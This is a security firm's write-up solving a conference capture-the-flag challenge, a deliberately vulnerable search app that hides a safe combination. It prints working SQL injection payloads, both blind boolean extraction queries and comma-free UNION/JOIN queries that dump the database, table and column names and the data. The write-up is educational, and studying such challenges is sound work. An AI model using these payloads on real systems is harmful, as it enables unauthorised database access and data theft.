B-Sides Manchester 2014
We hope everyone enjoyed the challenge. If you didn't notice, we had a combination safe on the Pentest stand, with a prize inside it. The combination for the safe was stored in a vulnerable web app, and everyone at the conference was invited to try and break in. The challenge was well received, so a big shout to Marcell for creating it!
If you want to have a go at the challenge, it is online at xref.info. The original challenge is there, and also a harder version. If you are going to attempt the challenge, stop reading now! There are spoilers below.
The app consists of a search box, which returns pictures of cats. It is easy to establish that the field is vulnerable to SQL injection. Most people quickly found the comment in the HTML source that points to the PHP source code. From here we can see the problem: we can't use commas in the payload. This is a deliberate restriction that stops people using tools like sqlmap to exploit the challenge.
We are aware of two basic solutions to the problem.
It is relatively straightforward to craft a query that returns true or false:
' and 1=1 #- the response contains five pictures of cats.
' and 1=2 #- the response contains no cat pictures.
What we want to do is get all the names of the tables in the database. Any tables that look interesting, we will get the names of the columns. Then we extract the data from interesting columns. The very first step is to get the name of the database, and we can use a query like this:
' and database() like 'a%' --
That query returns false, so what we need to do is script this to go through all the letters. We did this using Python, and after a few hasty fixes, the script reveals that the database name begins with "t". We can then repeat the process for the second letter, until we have extracted the full name: "test".
To get the table names we can use a query like this:
' and exists(select 1 from information_schema.tables where table_schema='test' and table_name like 'a%') --
Again, we need to script this to extract all the table names: "images" and "safe_codes". It is pretty clear which table is interesting to us!
To get the column names we can use a query like:
' and exists(select 1 from information_schema.columns where table_name='safe_codes' and column_name like 'a%') --
Once we've used the script to go through all the possibilities we find two columns: "location" and "code". Again, it is pretty clear which is the more interesting column.
To extract the codes we can use this query:
' and exists(select 1 from safe_codes where code like '1%') --
It's natural to script this to only consider numbers, and that produces a single code "1234". Unfortunately, that code does not open the safe. The mistake is that the true code actually contains letters and numbers. Running the script with letters enabled produces "S26112E" and that is the correct code to open the safe!
There may be more efficient blind exploitation techniques, but this is relatively simple and reliable.
When we designed the challenge we thought that a UNION injection would be impossible without a comma. However, one of the Pentest guys figured out the following syntax:
x' union select * from (select 1) a join (select database()) b join (select 1) c --
This extracts the database name directly and returns it in the src attribute of the image tag. From there we can proceed to extract the table names, column names, and finally the data:
x' union select * from (select 1) a join (select table_name from information_schema.tables where table_schema='test') b join (select 1) c --
x' union select * from (select 1) a join (select column_name from information_schema.columns where table_name='safe_codes') b join (select 1) c --
x' union select * from (select 1) a join (select code from safe_codes) b join (select 1) c --
Once you've figured out the join syntax, this approach is much more powerful than the blind approach. Respect to Dawid for his ninja SQL skills!
Three teams completed the challenge, in order of completion:
- James Kettle and Rohan Durve
- Nick Bloor
- Nathan Baggs and Matt King
Everyone who completed it got some chocolate as an immediate prize. For the main prize, the three groups were put in a hat (in front of everyone during the wrap up session), Dr Jessica Barker picked one out and it was James Kettle & Rohan Durve. The prize is a Lenovo tablet, although we're not sure how they've decided to split it!
Pentest offers a thorough, yet adaptive range of security services to help customers address vulnerabilities in their network or applications. Services include: Secure Coding Workshops, SAST tools, Manual Penetration Testing and Security Audits.
Pentest offers a complete Database Security Assessment Service (DSAS) to businesses that rely on the security of the information held within their databases or have concerns relating to the security compliance of these systems.